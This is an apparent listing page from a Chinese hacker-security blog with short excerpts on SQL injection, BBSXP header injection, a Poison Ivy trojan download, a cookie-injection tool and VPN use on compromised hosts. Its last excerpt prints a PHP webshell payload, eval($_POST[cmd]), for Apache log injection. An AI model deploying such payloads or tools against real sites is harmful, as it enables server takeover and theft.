信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
叩响邪恶的网络安全技术之门
——序邪恶八进制技术黑皮书
漫漫的技术银河中,无数的网络安全技术高手,像夜空里闪亮的繁星。是他们给还在黑夜中迷惘求学的晚辈们点亮着微弱的长明之灯,照亮了通往神圣最高的技术殿堂的泥泞小路。艰难的学习之中,我们这些有着同一目标而所长不同的朋友们团结了起来。我们没有传说中的业内前辈肩上的勋章,也不是焦点瞩目技术精湛的高手。我们就是我们,一群普通而又努力追求技术的网络安全学习者,幻想
作者:空虚浪子心[X.G.C] http://cnxhacker.net
来源:IT168
原文地址:http://publish.it168.com/2007/0611/20070611051901.shtml
【编者按】本文为了能够更为清晰的表述SQL注入在Ajax时代依然是安全隐患,在互联网上随机搜索到存在此类安全漏洞的网站。
这个例子也证明了SQL注入并非是Web1.0时代的专利,当新兴技术如Ajax发展促使互联网演进到2.0时代时,这种入侵方法依然存在,依然值得我们警惕。
同时我们郑重声明,本文作者寻找漏洞只是为了“依靠事实说话”而已,没真正入侵其服务器。我们承认较之以往,Ajax技术给我们带来的诸多便利,但这并不表明Ajax技术是万能的,用户再也不需要自己动手处理安全问题。
阅读全文 »
鬼仔注:这个BBSXP的log注入在一月份发过,在 这里 ,不过当时那篇文章说的只是注入,但是没有写拿shell的方法,这篇的分析比较详细,拿shell的方法也不错。记录下。
来源:Sobiny's Blog
这个东西是去年前发现的了。好象内容细节在哪个杂志上发了。不过似乎杂志和作者都没跟我联系呢?不管,发了再说。
针对BBSXP7的,是HTTP头注入。
没有多大的看头,熟悉的朋友,请从后面拿SHELL的地方开始看。
反正看得懂的就看。
看不懂的请提问,不过希望大家问一点有水平的问题。
太基础的,GOOGLE上可以搜索到的问题,恕我不回答。
我们都知道
阅读全文 »
Poison Ivy又更新了,还没仔细看,马上上课了。
下载地址:这里
鬼仔注:我没有测试。
软件作者:TTFCT
信息来源:邪恶八进制信息安全团队
编写语言:PHP(源代码)
程序功能:自动猜表,自动猜列,自动暴字段内容。
程序编写思路,使用 1=1和1=2作为判断依据。
其猜表,猜列,暴内容都是基于此原理。
注:cookie1.php为猜表和字段代码,cookie2.php为猜解内容代码,table.txt和column.txt分别为表和字段,可自行添加。
图示
程序及演示动画下载:cookieinj.rar
Tags: Cookie, SQL Injection, SQL注入鬼仔注:从VPNShare中提取出来的,遥志软件出的,就是出CCProxy和CMailServer的公司。
在golds7n那里看到这个东西的,说是:
远程执行一次即可(不需要远程屏幕控制操作)
但是这样只能开启VPN,不能自动添加用户。
我看了下,如果添加用户的话,用户信息记录在VPN Server Start.exe同目录下的VPN Server Start.ini中,因此可以先配置好一个ini,然后连同VPN Server Start.exe一同上传就好了。
这个东西方便开启VPN,但是有个缺点,就是没有隐蔽性可言,大家运行下看看就知道了,不方便在肉鸡上用。
然后我下了个完整的VPNShare回来,把里面的CC VPN Client也提取出来了,一起提供下载:
阅读全文 »
来源:茄子乱语
PS:文章说的出错鸟,事后剑心提醒我才发现,有忽悠人的嫌疑,Connection HTTP标头和能不能写入空格无关!!
记得Zizzy写过一篇《关于php包含Apache日志的随想》,这是一个很好的思路,我们可以随意构造
http://www.exp.com/index<?/**/eval($_POST[cmd]);/**/?>.php
这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:
http://www.milw0rm.com/exploits/4029
不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,PHP将 阅读全文 »
Tags: PHP, 漏洞
